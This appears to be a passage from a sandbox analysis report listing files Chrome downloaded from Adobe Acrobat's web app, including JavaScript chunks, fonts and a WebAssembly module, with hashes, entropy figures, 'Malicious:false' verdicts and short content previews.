                                                      Preview::... .-...... .A.:.... . .A..j6... . .A..j".6... . . ...7...A.!....@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!.... .$..@ .....4.....A. .E....@ .g .gj".A.K.. .A.F.@ .A.F.. .A.F.. .. ..~B .P...#.!..@.@A....!..4 . .A...j...!..-. .$..@ .....4..... . .l".AyO.( .A.j.!. . .A.q6... . . .Axqk6... . .A.v".6... . .A.v .k".6... .A..j ....!. .A.:... .A.:... .A.:... . .A..j6....@ .A.j .A..jA.....). .$. .#.A..=j6... .(..."..@#.!. . .6...#.(..".!..@#. .G.@ .A.j .A..j .A.k-...". .(.. .A.k".(..kA.k6.. .....#.(..".(.. .(..". .(..k".A. . .O.I.@ .A.6.... .$....... .-....@ .A.:.... .-....@ .A.:......... ..@ .A..;... . .6... . .6... .A.:... .A.:... .A.:... . .6... .A.:... .A.:... .#.A..=j6....@ ..@ .!..@ ..... .(...!. .A.k".... .A.:... .-...... .A.:.... . .A..j6... . .A..j".6... . . ...7...A.!....@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!..). .$..@ .....4...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (23469)
                                                      Category:downloaded
                                                      Size (bytes):23527
                                                      Entropy (8bit):5.464889952570037
                                                      Encrypted:false
                                                      SSDEEP:384:9kT8eCiE9ChjP7LTQCic/M1IKryKQPMb25AWX/pnP1krUEqRRtQwfTRT+hWlZc09:oCiGChLjQCiSkryKQPMaAWPpntkrUEq9
                                                      MD5:BB4A44349A7CFCBEDA9E871AA714BF87
                                                      SHA1:5684C59CDC45DE610E444374C81F5A26660D5518
                                                      SHA-256:D850B22178614B528B7BE2B4C5E8A5A7B4B275528CA9FAD267CA1869A5EE3010
                                                      SHA-512:D04472986E85490FDA09A73E3AB0DCA77E4D2AB30735CDDF8B4E6E7783AC405C550B74E2FA508BED6C7B77352854CF8D84D98FA0AC5AEA2D33CABA3C7010F509
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/genAIProvider-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4410],{pm8e:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>GenAIProvider});var i=o("Uohe"),n=o("plsW"),s=o("4PKp"),r=o("PGMW"),a=o("DlMc"),c=o.n(a),l=o("4llJ"),u=o("t3LK"),d=o("Qvga"),f=o("XEZ0"),g=o("wQpj"),I=o("jHMz"),m=o("gmFL"),h=o("QPTb"),S=o("835Y"),P=o.n(S),w=o("xvBn"),v=o("lV99"),E=o("3aG4"),b=o("WsOM"),p=o("zjjr"),A=o("6Eex"),D=o("Eni7"),O=o("efTs"),_=o("YUzc"),y=o("Q+Gt"),T=o("IU3W"),N=o("mRmh"),C=o("tr63"),L=o("vS73"),M=o("zGZ6"),G=o.n(M);function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,i)}return o}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(o),!0).forEach((function(t){_defineProperty(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getO
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (57965)
                                                      Category:downloaded
                                                      Size (bytes):58009
                                                      Entropy (8bit):5.518743932053909
                                                      Encrypted:false
                                                      SSDEEP:1536:lxuKk9dbpF+lZ+2BPnyvy4ywyFEMrjjPenhYtNeApuuHFiZ:HWUzPB6qX/FEM/jv2
                                                      MD5:9F49BD1DADFA673C13BB9C6249D857D7
                                                      SHA1:32D474041248E813F584CE831EBBD8B90B68E408
                                                      SHA-256:C43F9B346F03CBE9D9EB9B8FE2A7D8ECAB3C7F0AF9C05E2ED5DF0C2B236E0B09
                                                      SHA-512:D32D86118C087F0C2C7B8940263F82B2BD3E7828D9EB6610E043DA8656D541EA90208106B5CDC40F2D2C2801801F4CFD63CC3235F45F44057E88B5B6B58D352F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/web-app.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[187],{ihDU:(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>oe});var a=i("YWiy"),n=i("Zm2D"),o=i("/hLX"),r=i.n(o),s=i("plsW"),l=i("NxVT"),d=i("Qwdt"),c=i.n(d),p=i("x6CA");const ViewUtil=e=>t=>a.createElement("section",{style:{alignItems:"center",color:"#4b4b4b",display:"flex",flexDirection:"column",height:"100%",justifyContent:"center",textAlign:"center"}},a.createElement(e,t)),AccessDenied=e=>{let{dropinId:t}=e;const[i,n]=(0,a.useState)("Access denied"),[o,r]=(0,a.useState)("You do not have access to this service. Contact your IT administrator to gain access."),[s,l]=(0,a.useState)("Sign in with a different account");return(0,a.useEffect)((()=>{(0,p.i)(t,"ACCESS_DENIED").then(n).catch((()=>{})),(0,p.i)(t,"NO_ACCESS_MSG").then(r).catch((()=>{})),(0,p.i)(t,"SIGN_IN_DIFF").then(l).catch((()=>{}))}),[]),a.createElement("div",{style:{display:"flex",flexDirection:"column",gap:"13px",alignItems:"flex-start",background:"wh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 39260, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):39260
                                                      Entropy (8bit):7.993604758899025
                                                      Encrypted:true
                                                      SSDEEP:768:dyHJc4NeqjAAWTJfKcaAhg9u7Us4W9Jhr3Qv97XGGZld6+U:d8c4ZcZJfpa+gH89r3QxXGGZ7O
                                                      MD5:35234F8ADC394C536031C99D7AC8484F
                                                      SHA1:12EBFA0153118FAB8664C3B8EF696B64F4EA8EB5
                                                      SHA-256:E024FB3F5D381FE02FA0BC243DC557D5DAFF401F1B89220EBDFDA89D5F99D207
                                                      SHA-512:321228BAE69BF8A5F19A2B281FFC0123BBF1F4DF6DD843CCFB7EF45E22295BA9FB33E4D436FA13BB25C14028F51E795F09D233CAA6A6A1AD7B9A5144DA6A8197
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://use.typekit.net/af/a2527e/000000000000000000017704/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n8&v=3
                                                      Preview:wOF2OTTO...\....................................F...n?DYNA.i?GDYN.Q..J.`..P...6.$..@....g. ..........@...#..p........5!.{...._..7........?.......u..{q....=....a..+...m../..N....{....N:wD..Z..Fq.U.L.%..K.T.#9.I:..... *.':@...=~....vf.....d.;.jU^..W...-...n.x.B .i...fP.sg/..?.n...M.G1..$..4uj....PdK.;......s...m..........cO..yg.w...S...fPD.aw........!a..N3.x.^R/....C8g..$Mcr.2Q.b....Xa+s.w.@......]..8.....K.6...,...C\d~#k......'B...x..z_/.>H....r...z-MO.t..+|p.). . %...=....P...i[....X..c......(t..B....U...E,D....$....<w$...Y..2..z.OU...q.7wv..\T.^..J..R..)...a@m......A....B..@'.q ..#........KW..(.os.*......./}......q.Z.....4..K..t.+])..IJ...........x.a....d.Y...qX.{_.R.P.Ym=.o..t.#KfC.....x..Rb....N.S.!..Wl,-...IW.......@:A.6...R....N...2a..!.2r-d..*......A.....q(.!8)@#......J,..G..`.......,~.Y.....z..(.?..........:W...9.]_.0.........95..o..(..4l...`..v.<.0..0..."X.!.AA......p"....%p.....=.0<...+..|.....;......b......Cq.Vq:....[......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):75404
                                                      Entropy (8bit):5.012609225492632
                                                      Encrypted:false
                                                      SSDEEP:1536:UB9esOShSmVTtqjjsOPhPm7steZ1sO6/6UNsty3UynynxZazDQn2nPlavDzNXNWl:aO3
                                                      MD5:ABC1EB3EB532196024F1FEE8E0F2E97B
                                                      SHA1:59A4B0C494344C892554B341CB82AB9416A10209
                                                      SHA-256:BA11444ECBB2BDE23A82C2A517F34D48D8FDAC331D5B8ABE9905EBA42DBDD59E
                                                      SHA-512:C497E046B374B627D6D95E94D4B17C18BC36C04ABED4E16A449544B9DA7E2B84004B9E96C0BF434B30D094441139C89F7503519C63D1E2988F66BD17BBD1D0D1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/3256-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[3256],{Q49D:(r,e,a)=>{"use strict";e.I=function A4uChevronRight(r){var e=_extends({},r);return d.default.createElement("svg",_extends({viewBox:"0 0 36 36"},e,e),d.default.createElement("path",{fillRule:"evenodd",d:"M24,18v0a1.988,1.988,0,0,1-.585,1.409l-7.983,7.98a2,2,0,1,1-2.871-2.772l.049-.049L19.181,18l-6.572-6.57a2,2,0,0,1,2.773-2.87l.049.049,7.983,7.98A1.988,1.988,0,0,1,24,18Z"}))};var d=function _interopRequireDefault(r){return r&&r.__esModule?r:{default:r}}(a("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(r){for(var e=1;e<arguments.length;e++){var a=arguments[e];for(var d in a)Object.prototype.hasOwnProperty.call(a,d)&&(r[d]=a[d])}return r},_extends.apply(this,arguments)}},bTl1:(r,e,a)=>{(e=a("AXyZ")(!1)).push([r.id,':root{font-synthesis:weight}.spectrum-Card_6fdf9f{box-sizing:border-box;min-width:var(--spectrum-card-body-header-height,var(--spectrum-global-dimens
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):274981
                                                      Entropy (8bit):5.640703844986755
                                                      Encrypted:false
                                                      SSDEEP:6144:2RS0lW95iuAl3J6tJkmftlYB1B0mgNyGoKcS+BzW5stSiKtkV:CS0lWHHvDAQo
                                                      MD5:99F7C40AEE4C1C11E3057A575394BF99
                                                      SHA1:078613A5FC29F906F49CD6B9A76FB024269EB823
                                                      SHA-256:4F3E36FCDC535A62410349E79E170C2B7ED4638F80C9AC91C36C6AAC7998B95C
                                                      SHA-512:E5AEC4FB1743D4C56AB8E7DBBA0345E4FCBE90C60E9A7EAE7C987CE071F21F18BAAE0C0ED02F2B37D5DD1DFEAEF909C66F70F054FA475A313CB548EBA9D05BDD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/AIAContainer-chunk-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1347],{E82R:(e,t,n)=>{e.exports=n("aEmt")},aEmt:(e,t,n)=>{"use strict";var r=n("AAps");t.default=void 0;var o,i,s,a=r(n("QNma")),l=r(n("vPca")),c=r(n("khqL")),d=r(n("qavZ")),u=r(n("qJYQ")),p=r(n("i44B")),m=r(n("AAps")),g=r(n("YE4w")),f=n("yyL8"),A=n("f6H/"),h=r(n("/hLX")),b=r(n("YWiy")),v={"cs-CZ":(0,m.default)(n("wUE9")).default,"da-DK":(0,m.default)(n("GX9A")).default,"de-DE":(0,m.default)(n("wD2g")).default,"en-US":(0,m.default)(n("GslP")).default,"es-ES":(0,m.default)(n("CsJx")).default,"fi-FI":(0,m.default)(n("wfS/")).default,"fr-FR":(0,m.default)(n("sy+0")).default,"hu-HU":(0,m.default)(n("Tv1g")).default,"it-IT":(0,m.default)(n("UVHr")).default,"ja-JP":(0,m.default)(n("81HM")).default,"ko-KR":(0,m.default)(n("FCB+")).default,"nb-NO":(0,m.default)(n("65Eq")).default,"nl-NL":(0,m.default)(n("65MW")).default,"pl-PL":(0,m.default)(n("cnGp")).default,"pt-BR":(0,m.default)(n("qNYs")).default,"ru-RU":(0,m.default)(n("TM
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (39098)
                                                      Category:downloaded
                                                      Size (bytes):39145
                                                      Entropy (8bit):5.543437669908008
                                                      Encrypted:false
                                                      SSDEEP:768:WbVjU2EAb3kHdyc7Mi4NMPu83Lgq/uK7g:WbVjLb3Bt
                                                      MD5:A5EB67CE0FEB912972CB168B2B5F8D54
                                                      SHA1:2CFB3AFD7A6E4A4F51509F13361AB9659D72854D
                                                      SHA-256:901977349420560CA30BA4976FC687DEDE60643192555DEDBC64EA5E3A1D2696
                                                      SHA-512:957789BE7CB51A82B96C9C7433065AD350FA20A1475F9EB2C6B4CD7A1A0F420F4D7D483F92F697689723690DF5A9EA39300BEAC1ECA69865844D33BCFD2D98F0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/8590-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[8590],{yemR:(n,t,e)=>{"use strict";e.r(t),e.d(t,{default:()=>s});var o=e("cOr2"),r=e.n(o),a=e("yGwj"),l=e.n(a)()(r());l.push([n.id,".QnA__footer___EMnvq{font-size:var(--spectrum-global-dimension-font-size-75);padding:var(--spectrum-global-dimension-size-200)}.QnA__footer___EMnvq,.QnA__footer___EMnvq a{color:var(--spectrum-gray-600)}.QnA__questionInput___w8dys{background-color:var(--spectrum-global-color-gray-50);border:var(--spectrum-global-color-gray-300) solid var(--spectrum-alias-border-size-thick);border-radius:var(--spectrum-global-dimension-size-125);padding:var(--spectrum-global-dimension-size-25) var(--spectrum-global-dimension-size-25) var(--spectrum-global-dimension-size-75)}.QnA__questionInputDisabled___zuGFI{background-color:var(--spectrum-global-color-gray-200);border-color:var(--spectrum-global-color-gray-200)}.QnA__questionInputDisabledDark___yiW2R{background-color:var(--spectrum-global-color-gray-300);bo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):535
                                                      Entropy (8bit):4.471619400830602
                                                      Encrypted:false
                                                      SSDEEP:12:Y9qcRHBPRfPRdWkzGBiyybPRDXQPjK4X1:YPP1PjW6GJ8PdXQPnF
                                                      MD5:6194F3855050E2CA9FAEEC89DCE2BD62
                                                      SHA1:6EEF6E66AED89E3F3071BBE28ED31DC2F18093AF
                                                      SHA-256:7065DCDC949E26A300EA566A13991BB182E8B51F6BD2916C5ECDDDEB8D8882CB
                                                      SHA-512:4291B4C3317202D5562575365E13D8C8E92B025A90C44A506B80EEE7830099BC487A2BCD0F6D7A74266B7FD230C881188735D1EDD547DF65DB0B91F0499FA1C4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://files.acrobat.com/api/base_uris
                                                      Preview:{"ims":"https://ims-na1.adobelogin.com/","api":"https://files.acrobat.com/api/aax/","ui_helpers":"https://cloud.acrobat.com/api/aax/","users":"https://cloud.acrobat.com/api/aax/","download":"https://files-download2.acrocomcontent.com/api/ddx/","rendition":"https://files.acrobat.com/api/rrx/","send_api":"https://send-asr.acrobat.com/a/api/","prefs":"https://cloud.acrobat.com/api/aax/","upload":"https://upload2.files.acrobat.com/api/uux/","cloud_do_not_use":"https://cloud.acrobat.com/","commenting_uri":"https://comments.adobe.io/"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (6925)
                                                      Category:downloaded
                                                      Size (bytes):6980
                                                      Entropy (8bit):5.2920208220425415
                                                      Encrypted:false
                                                      SSDEEP:192:UJHPU5Zbjj3JbXqEDqeEtUHShy/nb6yJZT9XyLReCWcJIJkxJZV:0U/vtShMnb6OT9XQReCWuZV
                                                      MD5:28A4AE0A230D05E26B02DE9BE40E86AC
                                                      SHA1:343D860C660B3BA7A2FF0CDC9C3D451ECDD0E568
                                                      SHA-256:9259DF1A13CA975C5A1D670E10C0CE70E537D2289CDD4687D290015CFB117951
                                                      SHA-512:B5294E3C69B024FF84ACABD1C084E6623369F9167AA83D0C3A0447D222DCDA4AC766BF16E0A53CA789DDB1951020214A1BC1F5B33C41FF53908F650384E589CA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/recent-tools-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="131c0f61-4714-45df-8029-637a518ead3f",e._sentryDebugIdIdentifier="sentry-dbid-131c0f61-4714-45df-8029-637a518ead3f")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[159],{Xoja:(e,t,r)=>{"use strict";r.d(t,{Ee:()=>setItemInLocalStorage,PM:()=>getItemFromLocalStorage,Vt:()=>parseJSONValue,m3:()=>getItemFromSessionStorage,n4:()=>setItemInSessionStorage,qo:()=>deleteSessionStorageJob,ze:()=>removeItemFromSessionStorage});var o=r("plsW");function getItemFromSessionStorage(e){let t=null;try{t=window.sessionStorage.getItem(e)}catch(e){}return t}function setItemInSessionSto
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12808)
                                                      Category:downloaded
                                                      Size (bytes):12866
                                                      Entropy (8bit):5.658746832005109
                                                      Encrypted:false
                                                      SSDEEP:384:UBO+qSGzyArsAD5g26i+BCixHHx4j3c17+xa+eH9yS1JGW:UY+OzyWT5g26i+BCixHRuc17+7NS1JGW
                                                      MD5:EA10A9915C10AD09FB0CB045CC1A398C
                                                      SHA1:2B2BB22C149EFC7ACA96E281E92AEF5EDD91A606
                                                      SHA-256:33EB9B44AF17749AFFC7CF01052F38B989EAA75C69A6FB7599A018FE01C3718F
                                                      SHA-512:EAA529E28D10686DD710E098B09D4F83787B7CF7F21A3E4E0CBDD7120409629EBDD889EAFF86E678B74A8A82AF096F997239FAE816A6BD138750DAC9DE781EC2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/assistantButton-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[9573],{JkRg:(t,n,s)=>{"use strict";s.r(n),s.d(n,{default:()=>b});var a=s("YWiy"),o=s("plsW"),i=s("Uohe"),e=s("af1i"),r=s("PZ3W"),A=s.n(r),d=s("Zm2D"),l=s("zjjr"),u=s("oDTv"),_=s.n(u),p=s("JTTx"),c=s.n(p),B=s("wQpj"),C=s("WsOM"),g=s("98vq"),__awaiter=function(t,n,s,a){return new(s||(s=Promise))((function(o,i){function fulfilled(t){try{step(a.next(t))}catch(t){i(t)}}function rejected(t){try{step(a.throw(t))}catch(t){i(t)}}function step(t){t.done?o(t.value):function adopt(t){return t instanceof s?t:new s((function(n){n(t)}))}(t.value).then(fulfilled,rejected)}step((a=a.apply(t,n||[])).next())}))};const AssistantButton=t=>{let{onClick:n,isDisabled:s,shouldForceExpand:i,isSelected:r,label:u,style:p}=t;const[g,b]=(0,a.useState)(!1);(0,a.useEffect)((()=>{__awaiter(void 0,void 0,void 0,(function*(){(yield o.providers.device()).isMobileDevice()&&b(!0)}))}),[g]);const isDesktopSmallScreen=()=>{const t=window.matchMedia&&window.ma
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (47664)
                                                      Category:downloaded
                                                      Size (bytes):47779
                                                      Entropy (8bit):5.72293461375474
                                                      Encrypted:false
                                                      SSDEEP:768:LvIiV1ZTDe3GH6hqPPtDU+CyxibtXxVL7CG+pCI1iN9nCRFhhBF9ikREc92RawW4:5vFCklfxiJxF7C4I1SmxD9ik2bJ3dd
                                                      MD5:FCC9C6E8E3D4E408DB97C05A00F4A01C
                                                      SHA1:239571E9C9EFADB77063FD101584FCCECE003E6F
                                                      SHA-256:5C2A7F96D9B1251163245C92A8033BAD9582E93F27D3C7FA9C2AA9DB63E7A8C8
                                                      SHA-512:1DBEEF244FAB5BF0CF03E7BF2C717E51340963D6814DF4663E2B7B8AD8CFDC3267B6AB34AC49C7A9C2259FB9E330A5D3B81EE2269F21A5C294C4901E89F84D06
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.94.0/4260-chunk.js
                                                      Preview:/*! For license information please see 4260-chunk.js.LICENSE.txt */.(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[4260],{"9Bxo":(e,t,i)=>{"use strict";i.d(t,{n:()=>r});const o={"signed-in":{asset:"TutorialPanel/Confetti",title:"TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_IN",description:"TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_IN",action:"TRY_YOUR_OWN_FILE"},"signed-out":{asset:"TutorialPanel/Confetti",title:"TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_OUT",description:"TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_OUT",action:"START_FREE_TRIAL"}},r=[{id:"edit-organize-micro-demo-edit-text",title:"MICRO_DEMO_EDIT_TEXT_TITLE",recommendedIcon:i.p+"f5dd067e6d2bcc76b81bbad8801b179a.svg",tutorialData:{name:"edit-organize-micro-demo-edit-text","tutorial-initial-zoom":3,"tutorial-initial-scroll":0,"tutorial-end":o,"tutorial-steps":[{"tutorial-step":[{selector:'div[id="pageview-current-page"] > div > div[data-testid="overlayContainer4"] > div[class*="editOverlay"] > div:
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (46131)
                                                      Category:downloaded
                                                      Size (bytes):46181
                                                      Entropy (8bit):5.657973913567097
                                                      Encrypted:false
                                                      SSDEEP:768:OahlX61PWsyJsKsQoEUeTUJ5ghPKvR5HoPzDZhzjXvuSPm4x497Wp84VI0hmk5e/:Zg5aHw0ZZs
                                                      MD5:3A4B9978B631F227A639D93F0F8CD637
                                                      SHA1:A8D1B2CF6E5AE56C9F41150156B587FAFA9E9242
                                                      SHA-256:33280BB3A9CA6CB82D359EDE3C1FA0B81E9662BD5171EC13AFF51E06EEAF0DB5
                                                      SHA-512:526DF96517D740259D40CB9655150D398B0D68B3656A56978EA06083B457547357234C329D84F850F2AB3DBA68708542D79E455A2FA3B964528CB2C9CEE4D990
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/genai-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2925],{qCTy:(e,t,n)=>{"use strict";n.d(t,{w:()=>unsubscribeFromSelectors,x:()=>subscribeToSelector});var r=n("abd3");let o=[];const unsubscribeFromSelectors=()=>{o.forEach((e=>{e&&"function"==typeof e&&e()})),o=[]},subscribeToSelector=function(e,t,n){let a=arguments.length>3&&void 0!==arguments[3]?arguments[3]:(e,t)=>e!==t;for(var i=arguments.length,l=new Array(i>4?i-4:0),s=4;s<i;s++)l[s-4]=arguments[s];const c=(0,r.computed)((()=>t(e,...l)));let d=c.get(),u=!0;const p=(0,r.autorun)((e=>{const t=c.get();(a(d,t)||u)&&(u=!1,d=t,n(t,e))}));return o.push(p),p}},T02o:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>__WEBPACK_DEFAULT_EXPORT__,injectQnAStores:()=>injectQnAStores});var r=n("YWiy"),o=n("VjBA"),a=n("PGMW"),i=n("98vq"),l=n("itEc"),s=n("qW40"),c=n("Xw/t"),d=n("wTc/");const injectQnAStores=e=>t=>{const n={qnaStore:a.qnaStore,attributionStore:a.attributionStore,commonGenAIStore:a.commonGenAIStore,multiDocStore:c.A.ge
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:downloaded
                                                      Size (bytes):1048576
                                                      Entropy (8bit):7.190570154551791
                                                      Encrypted:false
                                                      SSDEEP:24576:woRC52/4nazggEh8jCcwUsv4wtEvzU42JFQ4ji:w/palEh8DVsvBtegJF3i
                                                      MD5:0512C2E638298F3451692092F5720ECA
                                                      SHA1:3C538797BC5C2254C0C75843750D6E2251E339DB
                                                      SHA-256:7DBB8EEE19588A7B52E46F2557B2FE9593005025FB1C2D3B3D04BE0541EE2EA3
                                                      SHA-512:97A0E18DF6634789A7362F48372526EA8CD31A49BEC2BC5A4E0D97CF4608BAFDF9C8ECD28C5B0211EEBD90BAB51090A2AD139B6FA58B10F248AA1A1D9F1397A2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/libcld_we.d7f1adfa2ee11651dd6fea8deccb4ddf.wasm:2f8f34ea0db3d5:0
                                                      Preview:.asm.......dylink.0...`.......`......`.....`...`....`....`..`.....`.........`......`.......`.......`...........`........`..........`................`.................9.env._ZdlPv...env.strcmp...env.fiprintf...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc...env.fwrite...env.memcpy...env.strchr...env.strlen...env.memset...env._Znam...env.memmove...env._ZdaPv...env._Znwm...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm...envJ_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc...env.siprintf...envI_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEmc...env.fputs...env.__cxa_allocate_exception...env.__cxa_free_exception...env.__cxa_throw...env._ZNSt11logic_errorC2EPKc...envH_ZNKSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm...env.strncpy...env.memchr...env.memcmp...env._ZNSt20bad_array_new_lengthC1Ev...env.__stack_pointer....env.__memory_base....GOT.mem._ZN4CL
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 38708, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):38708
                                                      Entropy (8bit):7.992698394213771
                                                      Encrypted:true
                                                      SSDEEP:768:E6JenowOpqmoah1+pPPpyhKERlXUMnAVFA8cSVud8td7BkuWp7K3xOUTI:N6d4qmoah+PUhJlXUMoFlcSMd8td7Bcv
                                                      MD5:9B7DF6DE861255C8E82EF093D507D3DD
                                                      SHA1:BD72B5EABBDCE88F1701A76E1469744D85CE663F
                                                      SHA-256:4B6A2E9B5AE1532E496A30FF9680B75A554CBE0785B4B12BEABD729477869C22
                                                      SHA-512:4C87B26AF358FEA3DED0996FD4B2DC1E2BD31E2BD841C7030E8D231E740ADD1ED6593594E827597AA3B35E2CEAD4553C5A8F5FD3F84C0E6A9F2BDEF4DEBADE16
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n4&v=3
                                                      Preview:wOF2OTTO...4.......8.............................F.../?DYNA.i?GDYN.Q..v.`..P...6.$..@...... .;...@.....b.=DT.zXDb>.....9!.{......W.........._..._..M|..|.Q......^}%.Y.'..Y..R2...6D......m....FR....ljd.%;>.v&/...."....>.'..<.j.`'....j'l..h......?O...eg...m[.2.?S.J..k. ..D.Y..X......... I......E4.`.IU.....M{..h.F.R.%....{7..&...0....ww.m..y.G..g..o}...KK7........P.j....-...`....+..S.#...C.'&.......>..-....V!F$.X..c.....g.G4....Nz;..oW...]...B..4..........;.......P@M.J...e..2...B...X. ......h......y..|XP.(.W1.=..|..._}...I.LW...zt..u...P..Hs..'<.s...J...#J..._..<...1.:dY{SU...?.ek....{a....e.;..=.oh.#.P>.h.F........|8:...7..bQ.NY.*.:.*/ES...tV.]... .H/..W.zT_5..Z5...l..5h-.{.<...1A.--..%>..0.9....../.!..p.g.X...2...U^Ah..C3../. ....&..4O..-.........g..f^G. ...@...4.-.GoPG......+..0...]#.}...V..S\0......B..`l....<..5...4JL..kL.f..RO.....M...M..>..p7...{.?..&>@.-;. r....^.....~...vp.....XHd...E3.C.n(..i..EX.u..8..8....x.gx..x.....dB..D..@..G.E.TA
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65411), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):86951
                                                      Entropy (8bit):4.822052051738292
                                                      Encrypted:false
                                                      SSDEEP:1536:ZBmovN1XDr8MX8RtQDxA72hKMecuTejMbEenBoMmGWkYLxLbXyG91V/+n/:ZBDN1XDr/8RtQDxACUTejMbEenBoMmGN
                                                      MD5:40342170C1B2E9E0B3DF27E0662D9E36
                                                      SHA1:2531C11F145C4330BC7A050699DC8CAD329259BD
                                                      SHA-256:070A0581161645C6C9CDE314F6D4E262CB4EAC720E08A708BF8242F6B83C0F8D
